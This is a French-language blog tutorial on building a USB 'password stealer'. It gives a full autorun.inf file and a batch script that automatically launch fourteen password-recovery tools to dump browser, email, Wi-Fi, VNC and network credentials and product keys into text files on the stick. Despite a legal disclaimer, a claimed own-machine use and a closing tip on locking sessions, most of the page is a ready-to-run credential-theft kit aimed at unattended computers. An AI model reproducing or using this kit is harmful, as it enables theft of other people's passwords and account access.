Comment réaliser un voleur de mot de passe avec une clé USB?

USB Password Stealer (traduisez “Voleur de mots de passe USB”) est comme son nom l’indique une clé USB capable de récupérer tous les mots de passe présents sur un ordinateur de façon automatique. Cela peut s’avérer bien pratique lorsque vous vous apprêtez à formater votre ordinateur et que vous voulez récupérer vos mots de passe Firefox, Thunderbird et autres sans y passer une après-midi complète

Il s’agit sans aucun doute d’une technique d’hacking alors il n’est pas nécessaire de rappeler que pirater un individu sans son consentement est un crime puni par la loi. Ce tutoriel est strictement à but éducatif et nous ne sommes pas responsables de l’usage que vous en ferez réfléchissez y à deux fois avant de l’essayer.

Nécessaire :

Pour cette astuce vous n’aurez besoin que d’une clé USB et d’un ordinateur doté d’une connexion internet.

Implémentation :

La clé USB embarque une Multitude de petits programmes tous spécialisés dans la capture de mots de passe, chacun pour une application particulière. Par exemple pour MSN, Chrome, Internet Explorer …etc. Vous l’aurez compris, c’est très simple d’utilisation mais très puissants (et potentiellement dangereux si on ne verrouille pas sa session…).

  • La première étape consiste à créer un AUTORUN qui va permettre d’automatiser le lancement des programmes récupérateurs de mots de passe présents sur la clé USB. Ouvrez donc votre éditeur de texte favori (Notepad++ ou Sublime Text par exemple) et collez-y le bout de code suivant :

[autorun]

« open=launch.bat


ACTION=Passer un scan».

Enregistrez ce fichier sur votre clé USB sous le nom de “AUTORUN.inf”.

  • Ensuite il faudra écrire le BATCH qui se chargera d’exécuter les programmes un à un. Ouvrez encore votre éditeur de texte et tapez les codes suivants :

« start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start PasswordFox.exe /stext passwordfox.txt

start OperaPassView.exe /stext OperaPassView.txt

start ChromePass.exe /stext ChromePass.txt

start Dialupass.exe /stext Dialupass.txt


start netpass.exe /stext netpass.txt

start WirelessKeyView.exe /stext WirelessKeyView.txt

start BulletsPassView.exe /stext BulletsPassView.txt

start VNCPassView.exe /stext VNCPassView.txt

start OpenedFilesView.exe /stext OpenedFilesView.txt

start ProduKey.exe /stext ProduKey.txt


start USBDeview.exe /stext USBDeview.txt».

Ce code est vraiment très simple à comprendre, on démarre un programme avec “start” et on enregistre dans un fichier texte ce qu’il nous renvoie grâce à la commande “/stext”.

Là encore, enregistrez ce fichier sur votre clé USB et nommez-le “launch.bat”.

  • Télécharger les programmes nécessaires à la mise en œuvre, sans cela l’astuce ne fonctionnera pas

« BulletsPassView, ChromePass, Dialupass, iepv, mailpv, mspass, netpass, OpenedFilesView, OperaPassView, PasswordFox, ProduKey, USBDeview, VNCPassView, WirelessKeyView »

  • Passez au test :

Débranchez votre clé USB en toute sécurité ensuite rebranchez-la, Maintenant rendez-vous sur votre clé. Vous pouvez voir que des fichiers texte sont apparus. Ce sont ces fichiers textes qui contiennent les mots de passe capturés par chaque programme.

J’espère vivement que ce tutoriel vous sera utile ; Pour se protéger de ce genre d’attaque veillez à installer un antivirus PREMIUM afin de bloquer l’exécution des programmes présents dans la clé USB sans oublier de verrouiller votre session à chaque fois que vous vous éloignez de votre ordinateur.  Pour rappel, le raccourci clavier pour verrouiller Windows est « Win + L ».


Voir aussi:

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

6 − 6 =